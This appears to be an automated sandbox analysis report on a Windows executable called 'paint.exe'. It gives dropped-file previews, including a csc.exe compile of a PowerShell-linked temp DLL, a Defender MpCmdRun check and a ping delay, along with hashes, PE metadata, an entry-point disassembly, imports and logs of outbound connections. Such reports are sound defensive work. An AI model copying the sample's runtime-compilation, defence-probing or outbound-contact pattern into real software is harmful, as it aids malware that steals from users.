                                                                                                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                                              Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                              MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                              SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                              SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                              SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                                                              Entropy (8bit):4.754235272695453
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6:Pz9NvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:Pr5pTcgTcgTLs4omvtAFSkIrxMVlmJHu
                                                                                                                                                                                                                                                              MD5:3D600CFBE2E341402525741903F3F100
                                                                                                                                                                                                                                                              SHA1:C950CF2FEDF7021B91BC04AA85217CCD51BBCE8C
                                                                                                                                                                                                                                                              SHA-256:5CCE82E0A99A5F0A48086A40B4508A2850A83DD6AF0A2699351B8FB14A783B55
                                                                                                                                                                                                                                                              SHA-512:F8524EB99FEFCF2222C07157735A5106F1F2900B270B47CEAC4A103D9515E9BB477352BA161F54576B68321D657DD569477E1ECA44E53362228330BA0BCF7115
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..Pinging 830021 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.994286468087256
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:paint.exe
                                                                                                                                                                                                                                                              File size:8'809'834 bytes
                                                                                                                                                                                                                                                              MD5:14f0421574fd16a0a6a7ac20fe22482b
                                                                                                                                                                                                                                                              SHA1:64974f8d78d54c43775ab2a67e4341442bfeb01a
                                                                                                                                                                                                                                                              SHA256:ee5707904b7372b5389df014be575f574497907db3cad4ba45d52adc8f12e0a3
                                                                                                                                                                                                                                                              SHA512:4bd79e9c67fc149888ff130c7e41dff166d2c2ba26b1ced48e01f1f8172a18b3c1c8c19643d978c60a1d635c3dc93105ce61931b06f886d6401433dfd8dec899
                                                                                                                                                                                                                                                              SSDEEP:196608:eYd1dh3wfI9jUCnORird1KfbLOYFSEcN2oc+nBIdAx:TddcIHOQ76bE1nnBI
                                                                                                                                                                                                                                                              TLSH:AC963351268148F5EEB35A3FD9625E4286B33C116320EAAF07E4C77ADD335F118397A2
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                                                              Icon Hash:306689f0d475355e
                                                                                                                                                                                                                                                              Entrypoint:0x14000ce20
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x677A36D4 [Sun Jan 5 07:37:56 2025 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                                              call 00007F06310C84FCh
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                                              jmp 00007F06310C811Fh
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                                              call 00007F06310C88C8h
                                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                                              je 00007F06310C82C3h
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                              jmp 00007F06310C82A7h
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              cmp ecx, eax
                                                                                                                                                                                                                                                              je 00007F06310C82B6h
                                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                                              jne 00007F06310C8290h
                                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                                              jmp 00007F06310C8299h
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                                              test ecx, ecx
                                                                                                                                                                                                                                                              jne 00007F06310C82A9h
                                                                                                                                                                                                                                                              mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                                              call 00007F06310C79F5h
                                                                                                                                                                                                                                                              call 00007F06310C8CE0h
                                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                                              jne 00007F06310C82A6h
                                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                                              jmp 00007F06310C82B6h
                                                                                                                                                                                                                                                              call 00007F06310D57FFh
                                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                                              jne 00007F06310C82ABh
                                                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                                                              call 00007F06310C8CF0h
                                                                                                                                                                                                                                                              jmp 00007F06310C828Ch
                                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                                                                              cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                                                                              jne 00007F06310C8309h
                                                                                                                                                                                                                                                              cmp ecx, 01h
                                                                                                                                                                                                                                                              jnbe 00007F06310C830Ch
                                                                                                                                                                                                                                                              call 00007F06310C883Eh
                                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                                              je 00007F06310C82CAh
                                                                                                                                                                                                                                                              test ebx, ebx
                                                                                                                                                                                                                                                              jne 00007F06310C82C6h
                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                              lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                                              call 00007F06310D55F2h
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x28520.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x764.reloc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rdata0x2b0000x12a280x12c004e9a93d8e219d154f6bf8129e675b4e8False0.5242838541666667data5.750775042670287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rsrc0x470000x285200x286002a86f00dc3ead57fc3de1eaa3f6fbf08False0.9907060274767802data7.989838280005199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .reloc0x700000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_ICON0x472500x363PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0126874279123415
                                                                                                                                                                                                                                                              RT_ICON0x475b40x6e1PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0062464508801816
                                                                                                                                                                                                                                                              RT_ICON0x47c980xb78PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0037465940054495
                                                                                                                                                                                                                                                              RT_ICON0x488100x17e2PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.001799149492967
                                                                                                                                                                                                                                                              RT_ICON0x49ff40x2792PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.001085883514314
                                                                                                                                                                                                                                                              RT_ICON0x4c7880x8118PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.0006354393609296
                                                                                                                                                                                                                                                              RT_ICON0x548a00x1a383PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0003817682387448
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x6ec240x68data0.7596153846153846
                                                                                                                                                                                                                                                              RT_VERSION0x6ec8c0x384data0.46
                                                                                                                                                                                                                                                              RT_MANIFEST0x6f0100x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                                                                              KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                                              ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                              GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.015024900 CET4973880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.020633936 CET8049738208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.020703077 CET4973880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.020775080 CET4973880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.025535107 CET8049738208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.552270889 CET8049738208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.607511997 CET4973880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.718888998 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.718913078 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.718988895 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.739370108 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.739392042 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.200479984 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.201030016 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.201045990 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.202012062 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.202205896 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.203599930 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.203672886 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.203901052 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.203908920 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.203963041 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.203999996 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206037998 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206077099 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206218004 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206258059 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206490993 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206513882 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206532001 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206559896 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206670046 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206680059 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206691980 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206701994 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206716061 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206722975 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206736088 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206743956 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206753969 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206762075 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206772089 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206778049 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206784010 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206789017 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206794977 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206803083 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206803083 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206819057 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206826925 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206832886 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206846952 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206854105 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206861019 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206865072 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206882000 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206882000 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206892967 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206899881 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206923008 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206928015 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206939936 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206949949 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206959009 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206971884 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206986904 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.206986904 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207000017 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207058907 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207077026 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207134962 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207144976 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207156897 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207207918 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207226992 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207241058 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207288980 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207309008 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.207321882 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.215915918 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216070890 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216085911 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216103077 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216109991 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216118097 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216136932 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216147900 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216159105 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216176033 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.216190100 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.218400955 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.848912954 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.848984003 CET44349739162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.849040985 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:37.849617004 CET49739443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:38.074127913 CET4973880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:38.079113007 CET8049738208.95.112.1192.168.2.4
